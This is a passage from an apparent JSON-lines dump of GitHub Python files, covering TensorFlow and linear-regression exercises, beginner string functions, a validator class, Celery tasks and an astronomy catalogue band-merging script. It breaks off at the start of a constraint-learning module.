print('Generation # {}. Train Loss (Test Loss): {:.2f} ({:.2f}). Train Acc (Test Acc): {:.2f} ({:.2f})'.format(*acc_and_loss))\n\n# 12. The output is as follows\n\"\"\"\nGeneration # 500. Train Loss (Test Loss): 0.66 (0.63). Train Acc (Test Acc): 0.21 (0.24)\nGeneration # 1000. Train Loss (Test Loss): 0.59 (0.61). Train Acc (Test Acc): 0.18 (0.22)\nGeneration # 9500. Train Loss (Test Loss): 0.14 (0.23). Train Acc (Test Acc): 0.17 (0.13)\nGeneration # 10000. Train Loss (Test Loss): 0.24 (0.20). Train Acc (Test Acc): 0.12 (0.13)\n\"\"\"\n\n# 13. Plot the loss and accuracy curves for the training and test sets\n
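# A minimal sketch of the plots step 13 calls for (illustrative; it only uses\n# the lists recorded in step 11 and the plt import from step 1):\nplt.plot(i_data, train_loss, 'k-', label='Train Loss')\nplt.plot(i_data, test_loss, 'r--', label='Test Loss')\nplt.title('Cross entropy loss per generation')\nplt.xlabel('Generation')\nplt.ylabel('Cross entropy loss')\nplt.legend(loc='upper right')\nplt.show()\n\nplt.plot(i_data, train_acc, 'k-', label='Train Accuracy')\nplt.plot(i_data, test_acc, 'r--', label='Test Accuracy')\nplt.title('Train and test accuracy per generation')\nplt.xlabel('Generation')\nplt.ylabel('Accuracy')\nplt.legend(loc='lower right')\nplt.show()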
\n\n","repo_name":"NetworkRanger/tensorflow-ml-exercise","sub_path":"chapter07/demo_7.3.py","file_name":"demo_7.3.py","file_ext":"py","file_size_in_byte":6169,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"42917230696","text":"def sayHello(name):\n print(\"Hello\", name)\n return\n\nname = input(\"Enter your name\")\nsayHello(name)\n\n#Performing sum of numbers\n\ndef addNum(a, b):\n c = a +b\n return c, a, b\n\nprint(addNum(2, 3))\n\n# pass list as a parameter\n\nlist1 = [1, 2, 3, 4, 5, 6, 7, 8, 9]\nlist2 = [2, 3, 4]\n\ndef addNumFromList(list1):\n for x in list1:\n print(x)\n\naddNumFromList(list2)\n\n# Defining lambda or anonymous function\n\nsquare = lambda x: x*x\nprint(square(5))\n\ndef squares(x):\n return x*x\n\nprint(squares(5))\n\na = input(\"Enter a string\")\nprint(len(a))\n\nprint()\n\n# Printing string in all uppercase letters\n\nprint(a.upper())\nprint(a.split(\" \"))\n\nb = input(\"Enter a group of words\")\n\nwords = b.split(\" \")\nprint(words)\nc=''\nfor x in range(len(words)):\n c += words[x]\n if x < len(words) - 1:\n c += '-'\n\n\nprint(c)\n\nname = input(\"Enter your name\")\nnames = name.split(' ')\nfinal = ''\nfor x in range(len(names)):\n final += names[x].capitalize()\n final += \" \"\n\nprint(final)\n","repo_name":"LakshBhambhani/De-Anza-Python","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"16115889136","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pylab as plt\n\ndfLoad=pd.read_csv('https://raw.githubusercontent.com/hanwoolJeong/lectureUniv/main/testData_LinearRegression.txt',sep=\"\\s+\")\nxxRaw=np.array(dfLoad.values[:,0])\nyyRaw=np.array(dfLoad.values[:,1])\nplt.plot(xxRaw,yyRaw,\"r.\")\n\nN=len(xxRaw)\nxx_bias=np.c_[np.ones([100,1]),xxRaw]\nyy=yyRaw.reshape(N,1)\n\nwOLS=np.linalg.inv(xx_bias.T.dot(xx_bias)).dot(xx_bias.T).dot(yy)\nx_sample=np.linspace(0,2,101)# sample points from 0 to 2\nx_sample_bias=np.c_[np.ones([101,1]),x_sample]# add a column of ones for the bias term\ny_bias=wOLS.T.dot(x_sample_bias.T)# transpose x so the matrices can be multiplied\nplt.plot(x_sample.reshape(1,101),y_bias,\"b.-\")\neta=0.1\nn_iteration=1000\nwGD=np.zeros([2,1])\nprint(wGD)\nfor iteration in range(n_iteration):\n gradients=-(2/N)*(xx_bias.T.dot(yy-xx_bias.dot(wGD)))\n wGD=wGD-eta*gradients\nprint(wGD)","repo_name":"seotaek/machine-learning","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"33582126331","text":"\"\"\"This module has a class inherited by more specific validators.\"\"\"\nimport logging\nfrom abc import ABC, abstractmethod\n\nfrom utils.structure import Structure\n\n\nclass Validator(ABC):\n \"\"\"Base class inherited by more specific validators.\"\"\"\n\n def __init__(self, validation_message: str):\n self.validation_message = validation_message\n\n @abstractmethod\n def validate(self) -> bool:\n 
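# Concrete subclasses (e.g. a hypothetical SchemaValidator) override this to\n # run one specific check and return True when the artifact passes it.\n 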
\"\"\"Each class implements this method with a specific validation.\"\"\"\n\n def write_validation_message(self, message: str = \"\"):\n \"\"\"Writes validation message.\"\"\"\n if message != \"\":\n message = message.replace(Structure.repository_folder, \"\")\n logging.info(\"%s\", message)\n else:\n self.validation_message = self.validation_message.replace(\n Structure.repository_folder, \"\")\n logging.info(\"%s\", self.validation_message)\n logging.debug(\"\")\n\n @staticmethod\n def write_debug_message(message: str):\n \"\"\"Writes debug message if needded.\"\"\"\n logging.debug(\"%s\", message)\n","repo_name":"PlatformOfTrust/standards","sub_path":"tools/ontology-validator/validators/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"75057995483","text":"# def check_S(S):\n# try:\n# a = S[0]\n# for i in S:\n# if i != a:\n# return False\n# return True\n# except:\n# return True\n#\n# def remove_S(S):\n# a = S[0]\n# for i in range(1, len(S)):\n# if S[i] != a:\n# S = S[:i - 1] + S[i + 1:]\n# return S\n# else:\n# a = S[i]\n#\n# def solution(S):\n#\n# while not check_S(S):\n# S = remove_S(S)\n#\n# return len(S)\n\ndef solution(s):\n zero_count, one_count = 0, 0\n for i in s:\n if i == '0':\n zero_count += 1\n else:\n one_count += 1\n\n return abs(zero_count - one_count)\n\n\nprint(solution(\"1011\"))\nprint((solution(\"0110011\")))\nprint(solution(\"000111\"))","repo_name":"algo-gogo/algo_study","sub_path":"프로그래머스/코딩테스트/ssg/one/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"72419331165","text":"import sys\nimport warnings\nimport dateutil.parser\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.utils import exceptions\nfrom datetime import timedelta\nimport pkg_resources\nimport tempfile\nimport subprocess\nfrom distutils.util import strtobool\nimport os\n\n__author__ = 'hfarnhill'\ndescription = '''\nConvert VPHAS+ source lists obtained from the ESO archive into\nband-merged catalogues.\n\nEither a list of files, or a directory path which contains only\nthe files to be bandmerged should be provided.\n\nThe script produces single-band catalogues prior to the\nbandmerging, which can be kept by using the -k flag.\n\nThe radii of apertures used to measure flux from VPHAS+ images\nare defined relative to a \"core\" radius of 1 arcsecond. For\napertures 1-7 the radii are:\n1 : 1/2 * rcore\n2 : 1/sqrt(2) * rcore\n3 : rcore\n4 : sqrt(2) * rcore\n5 : 2 * rcore\n6 : 2*sqrt(2) * rcore\n7 : 4 * rcore\nBy default, magnitudes corresponding to the flux measured\nin aperture 3 are returned.\n\nThe crossmatching radius determines the maximum distance\n(in arcsec) between two sources in different filters before\nthey will not be associated.\n'''\n\n\ndef print_colour_warning(message=None):\n print(\"+----------------------------------------------------------------+\")\n if message is not None:\n lenzero = 63 - len(message)\n print('| {0}{1: <{2}}|'.format(message, ' ', lenzero))\n print(\"| Please supply EITHER: |\")\n print(\"| * a full or partial set of RED concatenation source lists, OR |\")\n print(\"| * a full or partial set of BLUE concatenation source lists. 
|\")\n print(\"| |\")\n print(\"| Do NOT: |\")\n print(\"| * Mix & match from red and blue concatenations |\")\n print(\"+----------------------------------------------------------------+\")\n\n\ndef runmerge(filelist, radius, aperture, xmx, keep, nomerge, clobber):\n if len(filelist) > 8:\n print_colour_warning()\n sys.exit(0)\n\n # Create empty table which will store key FITS header information\n dtype = [('Filename', '|S256'), ('FieldID', '|S10'), ('obsdate', '|S8'), ('Filter', '|S6'), ('Exp', int),\n ('concat', '|S3'), ('order', int)]\n table = np.zeros((len(filelist)), dtype=dtype)\n\n order = {'r_SDSS': 0, 'i_SDSS': 2, 'NB_659': 4, 'u_SDSS': 2, 'g_SDSS': 4}\n\n # Run through the supplied filenames, populating the table with header keywords\n for i, fn in enumerate(filelist):\n table[i]['Filename'] = fn\n h = fits.getheader(fn, 0)\n table[i]['FieldID'] = h[\"OBJECT\"].rstrip()\n table[i]['Filter'] = h[\"HIERARCH ESO INS FILT1 NAME\"].rstrip()\n\n intermediate = {1: 1, 2: 3, 3: 2}\n if h[\"HIERARCH ESO TPL NEXP\"] == 3:\n table[i]['Exp'] = intermediate[h[\"HIERARCH ESO TPL EXPNO\"]]\n else:\n table[i]['Exp'] = h[\"HIERARCH ESO TPL EXPNO\"]\n table[i]['order'] = order[table[i]['Filter']] + table[i]['Exp']\n\n # If the image was obtained after midnight, adjust date observed to agree with start of night's observations\n obsdate = dateutil.parser.parse(h['DATE-OBS'])\n if obsdate.hour < 12:\n obsdate -= timedelta(days=1)\n table[i]['obsdate'] = \"{0}{1:02}{2:02}\".format(obsdate.year, obsdate.month, obsdate.day)\n\n # Use fact that OBS NAME follows format \"p88vphas_1294_hhna\" where first character\n # after field identifier can distinguish between red and blue concatenations.\n # Individual third g pointings will have first character 'g'.\n concat = h[\"HIERARCH ESO OBS NAME\"].split('_')[2][0]\n if concat == 'h':\n table[i]['concat'] = 'red'\n elif concat == 'u':\n table[i]['concat'] = 'blu'\n elif concat == 'g':\n table[i]['concat'] = 'blu'\n table[i]['Exp'] = 3\n table[i]['order'] = 7\n\n # Ensure that red and blue r-band exposures are not being mixed.\n if len(np.unique(table['concat'])) > 1:\n print_colour_warning(\"ERROR: Mix of red and blue concat r-band filters.\")\n sys.exit(0)\n\n # Check that only one unique VPHAS field is being bandmerged\n if len(np.unique(table['FieldID'])) > 1:\n print_colour_warning(\"ERROR: Mix of VPHAS fields.\")\n sys.exit(0)\n\n # Check that there are not too many source lists from any given filter, and that\n # no pointing is repeated (e.g. 
no 2x r_1 - should be r_1 and r_2)\n if table[0]['concat'] == 'red':\n filter_set = ['r_SDSS', 'i_SDSS', 'NB_659']\n else:\n filter_set = ['r_SDSS', 'u_SDSS', 'g_SDSS']\n filter_max = [2, 2, 3]\n for i, filt in enumerate(filter_set):\n mask = np.where(table['Filter'] == filt)\n if len(table[mask]) > filter_max[i]:\n print_colour_warning(\"ERROR: Too many {0}-band source lists\".format(filt))\n sys.exit(0)\n exposures = np.unique(table[mask]['Exp'], return_counts=True)\n if np.any(exposures[1] > 1):\n print_colour_warning(\"ERROR: Repeated {0}-band pointing source lists\".format(filt))\n sys.exit(0)\n\n # Check that if an Ha image is present, that an r band from the same night is also present (for calibration)\n if 'NB_659' in table['Filter']:\n if 'r_SDSS' not in table['Filter']:\n print_colour_warning(\"Need Halpha and r-band catalogues from same night.\")\n sys.exit(0)\n ha_frames = np.where(table['Filter'] == 'NB_659')\n r_frames = np.where(table['Filter'] == 'r_SDSS')\n for night in np.unique(table[ha_frames]['obsdate']):\n if night not in table[r_frames]['obsdate']:\n print_colour_warning(\"Need Halpha and r-band catalogues from same night.\")\n sys.exit(0)\n\n table = np.sort(table, order=['order'])\n\n for row in table:\n single_band(row, aperture, clobber)\n\n if len(table) > 1 and not nomerge:\n merge(table, radius, clobber, xmx)\n attach_headers(table)\n\n if not keep:\n for row in table:\n outfn = \"{1}_{2}_{3}_{4}.fits\".format(*row)\n os.remove(outfn)\n\n\ndef single_band(fieldinfo, aperture, clobber):\n outfn = \"{1}_{2}_{3}_{4}.fits\".format(*fieldinfo)\n if os.path.isfile(outfn) and not clobber:\n if not check_clobber(outfn):\n sys.exit(0)\n else:\n clobber = True\n\n print(\"+----------------------------------------------------------------+\")\n print(\"| Calculating magnitudes from fluxes using APERTURE {0} for |\".format(aperture))\n print(\"| field {0}, filter {1}, exposure {2}. 
|\".format(fieldinfo[1], fieldinfo[3], fieldinfo[4]))\n print(\"+----------------------------------------------------------------+\")\n\n filts = {'NB_659': 'Ha', 'r_SDSS': 'r', 'i_SDSS': 'i', 'g_SDSS': 'g', 'u_SDSS': 'u'}\n filtnam = filts[fieldinfo[3]]\n expno = fieldinfo[4]\n\n f = fits.open(fieldinfo[0])\n EXPTIME = float(f[0].header['EXPTIME'])\n\n totrows = 0\n for ccd in range(1, 33):\n totrows += int(f[ccd].header[\"naxis2\"])\n\n outcols = [59, 60, 61, 58, 55, 63, 64, 65, 66]\n if filtnam == 'r' and expno == 1:\n coords = ['RA', 'DEC']\n else:\n coords = ['RA_{0}_{1}'.format(filtnam, expno), 'DEC_{0}_{1}'.format(filtnam, expno)]\n colnames = coords + [\"Class_{0}_{1}\".format(filtnam, expno), \"Av_conf_{0}_{1}\".format(filtnam, expno),\n \"badpix_{0}_{1}\".format(filtnam, expno), \"CCD_{0}_{1}\".format(filtnam, expno),\n \"OID_{0}_{1}\".format(filtnam, expno), \"{0}_{1}\".format(filtnam, expno),\n \"err_{0}_{1}\".format(filtnam, expno)]\n colunits = [\"RADIANS\", \"RADIANS\", \"Flag\", \"Number\", \"Number\", \"Number\", \"Number\", \"mag\", \"mag\"]\n colp = []\n for i in range(len(outcols)):\n outcols[i] -= 1\n f[1].columns[outcols[i]].name = colnames[i]\n f[1].columns[outcols[i]].unit = colunits[i]\n colp.append(f[1].columns[outcols[i]])\n nrows = 0\n for ccd in range(1, 33):\n ZP = float(f[ccd].header[\"MAGZPT\"])\n APCOR = float(f[ccd].header[\"APCOR{0}\".format(aperture)])\n data = f[ccd].data\n rows = f[ccd].header[\"naxis2\"]\n for i in range(rows):\n data[i][62] = float(ccd)\n data[i][63] = float(nrows + i + 1)\n if data[i][23] > 0.:\n data[i][64] = ZP - APCOR - 2.5 * np.log10(data[i][23] / EXPTIME)\n magerr = 2.5 * np.log10(1. + data[i][24] / data[i][23])\n data[i][65] = max(0.001, magerr)\n else:\n data[i][64] = 99.99\n data[i][65] = 99.99\n if ccd == 1:\n newtab = fits.new_table(colp, nrows=totrows)\n else:\n for i in range(len(outcols)):\n newtab.data.field(i)[nrows:nrows + rows] = f[ccd].data.field(outcols[i])\n nrows = nrows + rows\n\n # fill in information for new columns\n newtab.header[\"TTYPE6\"] = \"CCD_{0}_{1}\".format(filtnam, expno)\n newtab.data.names[5] = \"CCD_{0}_{1}\".format(filtnam, expno)\n newtab.header[\"TUNIT6\"] = \"Number\"\n newtab.header[\"TTYPE7\"] = \"OID_{0}_{1}\".format(filtnam, expno)\n newtab.data.names[6] = \"OID_{0}_{1}\".format(filtnam, expno)\n newtab.header[\"TUNIT7\"] = \"Number\"\n newtab.header[\"TTYPE8\"] = \"{0}_{1}\".format(filtnam, expno)\n newtab.data.names[7] = \"{0}_{1}\".format(filtnam, expno)\n newtab.header[\"TUNIT8\"] = \"mag\"\n newtab.header[\"TTYPE9\"] = \"err_{0}_{1}\".format(filtnam, expno)\n newtab.data.names[8] = \"err_{0}_{1}\".format(filtnam, expno)\n newtab.header[\"TUNIT9\"] = \"mag\"\n # rename copied columns\n newtab.header[\"TTYPE3\"] = \"Class_{0}_{1}\".format(filtnam, expno)\n newtab.data.names[2] = \"Class_{0}_{1}\".format(filtnam, expno)\n newtab.header[\"TTYPE4\"] = \"Av_conf_{0}_{1}\".format(filtnam, expno)\n newtab.data.names[3] = \"Av_conf_{0}_{1}\".format(filtnam, expno)\n newtab.header[\"TTYPE5\"] = \"badpix_{0}_{1}\".format(filtnam, expno)\n newtab.data.names[4] = \"badpix_{0}_{1}\".format(filtnam, expno)\n\n warnings.filterwarnings('ignore', category=fits.verify.VerifyWarning, append=True)\n warnings.filterwarnings('ignore', category=exceptions.AstropyUserWarning, append=True)\n\n # copy primary HDU, add file name information and merge with table\n newhdu = fits.PrimaryHDU()\n newhdu.header = f[0].header\n newhdu.header.set(\"CASUFILE\", fieldinfo[0], comment=\"CASU File Name\", 
after=\"ARCFILE\")\n newhdu.header.set(\"VPHAFILE\", outfn, comment=\"VPHAS File Name\", after=\"CASUFILE\")\n\n # copy information from first header\n clin = f[1].header.cards\n for h in (\n \"MAGZPT\", \"MAGZRR\", \"EXTINCT\", \"APCOR3\", \"MED_PA\", \"NEBULISD\", \"CROWDED\", \"APASSZPT\", \"APASSZRR\",\n \"APASSNUM\"):\n newhdu.header.set(clin[h].keyword, clin[h].value, clin[h].comment)\n\n # Obtain ellipticity and seeing for each CCD append to header.\n # Calculate average value over whole field, append to header\n ellipticity = np.zeros(32)\n seeing = np.zeros(32)\n skylevel = np.zeros(32)\n for i in range(1, 33):\n ellipticity[i - 1] = f[i].header['ELLIPTIC']\n seeing[i - 1] = f[i].header['SEEING']\n skylevel[i - 1] = f[i].header['SKYLEVEL']\n newhdu.header.set(\"SEE_{0}\".format(i), f[i].header['SEEING'],\n comment=\"Average pixel FWHM from CCD{0}\".format(i))\n newhdu.header.set(\"ELL_{0}\".format(i), f[i].header['ELLIPTIC'],\n comment=\"Average ellipticity from CCD{0}\".format(i))\n newhdu.header.set(\"SKY_{0}\".format(i), f[i].header['SKYLEVEL'],\n comment=\"Median sky brightness from CCD{0}\".format(i))\n newhdu.header.set(\"SEEING\", np.mean(seeing) * 0.21, comment=\"Average FWHM (arcsec)\")\n newhdu.header.set(\"ELLIPTIC\", np.mean(ellipticity), comment=\"Average ellipticity\")\n newhdu.header.set(\"SKYLEVEL\", np.median(skylevel), comment=\"Average sky level (counts/pixel)\")\n\n current_module = sys.modules['bandmerge']\n newhdu.header.set(\"HISTORY\", \"created with vphas-bandmerge-standalone v\" + current_module.__version__)\n\n hdulist = fits.HDUList([newhdu, newtab])\n # verify output table and save\n hdulist.writeto(outfn, output_verify='silentfix', clobber=clobber)\n\n\ndef zpcorr(fields):\n zp_shifts = np.zeros(3, dtype=float)\n ha_frames = np.where(fields['Filter'] == 'NB_659')\n r_frames = np.where(fields['Filter'] == 'r_SDSS')\n for i, halpha in enumerate(fields[ha_frames]):\n obsdate = halpha[2]\n rband = fields[r_frames][np.where(fields[r_frames]['obsdate'] == obsdate)][0]\n rfits = fits.getheader(\"{1}_{2}_{3}_{4}.fits\".format(*rband), 0)\n rzp = float(rfits[\"MAGZPT\"])\n hfits = fits.getheader(\"{1}_{2}_{3}_{4}.fits\".format(*halpha), 0)\n hzp = float(hfits[\"MAGZPT\"])\n zpshift = rzp - 3.01 - hzp\n zp_shifts[i] = zpshift\n return zp_shifts\n\n\ndef attach_headers(fields):\n fieldID = fields['FieldID'][0]\n concat = fields['concat'][0]\n outfn = \"{0}_{1}.fits\".format(fieldID, concat)\n merged = fits.open(outfn, mode=\"update\")\n header_primary = merged[0].header\n header_extension = merged[1].header\n\n base_keys = ['OBJECT', 'RA', 'DEC', 'EQUINOX', 'RADECSYS']\n filternames = {'r_SDSS': 'r', 'i_SDSS': 'i', 'NB_659': 'Ha', 'u_SDSS': 'u', 'g_SDSS': 'g'}\n\n for i, field in enumerate(fields):\n single = fits.open(\"{0}\".format(field['Filename']))\n header_single = single[0].header\n # Add the five cards in base_keys to the header of extension #1 without any prefixes/HIERARCH\n # as this will allow Topcat to see them (when opened as FITS, but not FITS-PLUS)\n if i == 0:\n for key in base_keys:\n card = header_single.cards[key]\n header_extension.set(card.keyword, card.value, card.comment)\n # Add all header keywords to merge file with appropriate prefix\n header_primary.__delitem__(4) # Need to delete VOTDATA keyword - file will no longer conform to FITS-PLUS\n for card in header_single.cards[6:-1]:\n k = card.keyword\n if k == \"COMMENT\":\n if not card.value in header_primary.get_comment(): # Don't duplicate comments\n 
header_primary.add_comment(card.value)\n else:\n k = \"HIERARCH {0}_{1} {2}\".format(filternames[field['Filter']], field['Exp'], k)\n header_primary.set(k, card.value, card.comment)\n single.close()\n\n header_primary.set('EXTEND', 'T')\n\n current_module = sys.modules['bandmerge']\n header_primary.add_history(\"created with vphas-bandmerge-standalone v\" + current_module.__version__)\n warnings.filterwarnings('ignore', category=fits.verify.VerifyWarning, append=True)\n warnings.filterwarnings('ignore', category=exceptions.AstropyUserWarning, append=True)\n merged.writeto(outfn, clobber=True, output_verify='silentfix')\n\n\ndef merge(fields, radius, clobber, xmx):\n # Determine shift to bring Halpha zeropoints into agreement with r-band zeropoints from the same night\n if 'NB_659' in fields['Filter']:\n zp_shifts = zpcorr(fields)\n\n filters = {'red': ['r_SDSS', 'i_SDSS', 'NB_659'], 'blu': ['r_SDSS', 'u_SDSS', 'g_SDSS']}\n filternames = {'r_SDSS': 'r', 'i_SDSS': 'i', 'NB_659': 'Ha', 'u_SDSS': 'u', 'g_SDSS': 'g'}\n filtermultiplicity = {'r_SDSS': 2, 'i_SDSS': 2, 'NB_659': 3, 'u_SDSS': 2, 'g_SDSS': 3}\n\n stilts = pkg_resources.resource_filename(__name__, \"tools/stilts.jar\")\n if fields['concat'][0] == 'red':\n redpath = pkg_resources.resource_filename(__name__, \"tools/red.stilts\")\n tmp = tempfile.NamedTemporaryFile(suffix=\"_red.stilts\")\n scriptpath = tmp.name\n tmp.close()\n f = open(redpath, 'r')\n redscript = f.readlines()\n f.close()\n newscript = open(scriptpath, 'w')\n for line in redscript:\n newscript.write(line)\n newscript.write(\"replacecol Ha_1 \\\"Ha_1+{0}\\\"\\n\".format(zp_shifts[0]))\n newscript.write(\"replacecol Ha_2 \\\"Ha_2+{0}\\\"\\n\".format(zp_shifts[1]))\n newscript.write(\"replacecol Ha_3 \\\"Ha_3+{0}\\\"\\n\".format(zp_shifts[2]))\n else:\n bluepath = pkg_resources.resource_filename(__name__, \"tools/blue.stilts\")\n tmp = tempfile.NamedTemporaryFile(suffix=\"_blu.stilts\")\n scriptpath = tmp.name\n tmp.close()\n f = open(bluepath, 'r')\n bluescript = f.readlines()\n f.close()\n newscript = open(scriptpath, 'w')\n for line in bluescript:\n newscript.write(line)\n\n # Put together keepcol command (i.e. 
retain only the columns which describe the merged exposures)\n keepcmd = \"keepcols \\\"\"\n for col in ['RA ', 'DEC ']:\n keepcmd += col\n for exposure in fields:\n if exposure['Filter'] == 'r_SDSS' and exposure['Exp'] == 1:\n pass\n else:\n for col in ['dRA', 'dDEC']:\n colid = \"{0}_{1}_{2} \".format(col, filternames[exposure['Filter']], exposure['Exp'])\n keepcmd += colid\n for col in ['Class_', 'Av_conf_', 'badpix_', 'CCD_', 'OID_', '', 'err_']:\n colid = \"{0}{1}_{2} \".format(col, filternames[exposure['Filter']], exposure['Exp'])\n keepcmd += colid\n keepcmd += \"star\\\"\"\n newscript.write(keepcmd)\n newscript.close()\n\n # Check if output file already exists\n outfn = \"{0}_{1}.fits\".format(fields['FieldID'][0], fields['concat'][0])\n if os.path.isfile(outfn) and not clobber:\n if not check_clobber(outfn):\n sys.exit(0)\n\n # Call STILTS\n cmd = [\"java\", \"-Xmx{0}M\".format(xmx), \"-jar\", stilts, \"tmatchn\", \"matcher=sky\", \"params={0}\".format(radius),\n \"multimode=group\", \"nin=7\"]\n i = 1\n for filt in filters[fields['concat'][0]]:\n filtname = filternames[filt]\n for expno in range(1, filtermultiplicity[filt] + 1):\n mask = np.where((fields['Filter'] == filt) & (fields['Exp'] == expno))\n if len(fields[mask]) == 0:\n empty = pkg_resources.resource_filename(__name__, \"tools/{0}_{1}_empty.fits\".format(filt, expno))\n cmd.append(\"in{0}={1}\".format(i, empty))\n else:\n cmd.append(\"in{0}={2}_{3}_{4}_{5}.fits\".format(i, *fields[mask][0]))\n cmd.append(\"join{0}=always\".format(i))\n if filt == 'r_SDSS' and expno == 1:\n cmd.append(\"values{0}=radiansToDegrees(RA) radiansToDegrees(DEC)\".format(i))\n else:\n cmd.append(\"values{0}=radiansToDegrees(RA_{1}_{2}) radiansToDegrees(DEC_{1}_{2})\".format(i, filtname, expno))\n i += 1\n cmd.append(\"out={0}\".format(outfn))\n cmd.append(\"ocmd=@{0}\".format(scriptpath))\n\n print(\"Crossmatching between filters...\")\n subprocess.call(cmd, cwd=os.getcwd())\n\n if fields['concat'][0] == 'red':\n os.remove(scriptpath)\n\n\ndef check_clobber(fn):\n try:\n print(\"+----------------------------------------------------------------+\")\n print(\"| {0} exists.{1: <{2}}|\".format(fn, ' ', 55 - len(fn)))\n print(\"| Continuing requires that this file be overwritten. |\")\n print(\"| Note: You can avoid this message by specifying (-c) when |\")\n print(\"| invoking this script. |\")\n print(\"+----------------------------------------------------------------+\")\n response = input(\"Continue? (y/n) > \")\n response_bool = strtobool(response.lower())\n except ValueError:\n print(\"Invalid input.\")\n response_bool = check_clobber(fn)\n return response_bool\n\n\ndef process(args=None):\n import argparse\n import glob\n\n parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,\n description=description)\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument('-f', action='store', nargs='+', dest='files', help='Filenames of source lists.')\n group.add_argument('-d', action='store', nargs=1, dest='dir',\n help='Path of directory containing source lists for merging.')\n parser.add_argument('-a', action='store', nargs=1, dest='aperture', default=[3], type=int,\n help='Aperture # for measuring flux. Default = 3.')\n parser.add_argument('-r', action='store', nargs=1, dest='radius', default=[0.5], type=float,\n help='Crossmatching radius (arcsec). 
Default = 0.5.')\n parser.add_argument('-x', action='store', nargs=1, dest='xmx', default=[2048], type=int,\n help='Memory (in MB) for crossmatching. Default = 2048.')\n parser.add_argument('-k', action='store_true', dest='keep', default=False,\n help='Keep intermediate single-band catalogues.')\n parser.add_argument('-n', action='store_true', dest='nomerge', default=False,\n help='No bandmerging step (only generate single-band files)')\n parser.add_argument('-c', action='store_true', dest='clobber', default=False,\n help='Overwrite pre-existing files (no warnings!)')\n args = parser.parse_args(args)\n\n if not (0 < args.aperture[0] < 8):\n parser.error(\"Aperture must be an integer between 1 and 7.\")\n\n if args.nomerge:\n args.keep = True\n\n if args.files is None and args.dir is not None:\n filelist = glob.glob(\"{0}*.fits\".format(args.dir[0]))\n runmerge(filelist, args.radius[0], args.aperture[0], args.xmx[0], args.keep, args.nomerge, args.clobber)\n elif args.files is not None and args.dir is None:\n runmerge(args.files, args.radius[0], args.aperture[0], args.xmx[0], args.keep, args.nomerge, args.clobber)\n","repo_name":"lewyh/vphas-bandmerge-standalone","sub_path":"bandmerge/bandmerge.py","file_name":"bandmerge.py","file_ext":"py","file_size_in_byte":21817,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"70479895006","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@Author :Leo\n@Connect :lipf0627@163.com\n@File :tasks.py\n@Site :\n@Time :2019/5/26 14:20\n@Software :PyCharm\n\"\"\"\nfrom __future__ import absolute_import, unicode_literals\nimport time\nfrom celery import task, shared_task\n\n\n@task\ndef test(a, b):\n print('Task starting')\n print(a+b)\n time.sleep(10)\n print('Task finished')\n\n\n@shared_task\ndef test_beat(x, y):\n print(x+y)\n\n","repo_name":"TeamOfWeekend/mysite","sub_path":"home/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"579780742","text":"import itertools as it\nfrom sympy import symbols, lambdify, sympify, Symbol\nimport numpy as np\nimport logging\nimport json\nfrom cpmpy import *\nfrom cpmpy.solvers import CPM_ortools\nfrom cpmpy.solvers.ortools import OrtSolutionCounter\nfrom cpmpy.transformations.get_variables import *\nfrom cpmpy_helper import solveAll\nfrom instance import Instance\nimport time\nfrom musx import musx\n\nfrom cpmpy.transformations.flatten_model import get_or_make_var\n\nlogger = logging.getLogger(__name__)\n\n\ndef pairs(example):\n for [x, y] in it.product(example, repeat=2):\n yield x, y\n\n\ndef index_pairs(exampleLen):\n for (i, j) in it.combinations(range(exampleLen), r=2):\n yield i, j\n\n\ndef unary_operators():\n def modulo(x):\n return x % 2\n\n def power(x):\n return x * x\n\n def identity(x):\n return x\n\n for f in [identity, abs]:\n yield f\n\n\ndef generate_unary_exp(x):\n yield x\n # for u in unary_operators():\n # yield u(x)\n\n\ndef binary_operators(x, y):\n # for u in unary_operators():\n yield x + y\n yield x - y\n yield y - x\n\n\ndef generate_binary_expr(x, y):\n yield x + y\n yield x - y\n yield y - x\n yield abs(y - x)\n # yield abs(x-y)\n\n # for b in binary_operators(x, y):\n # for u in generate_unary_exp(b):\n # yield u\n\n\ndef constraint_learner(solutions, n_vars):\n bounds = dict()\n x, y = symbols(\"x y\")\n for u in generate_unary_exp(x):\n k = str(u)\n bounds[k] = dict()\n f = lambdify(x, u, \"math\")\n for i in range(n_vars):\n bounds[k][(i,)] = 
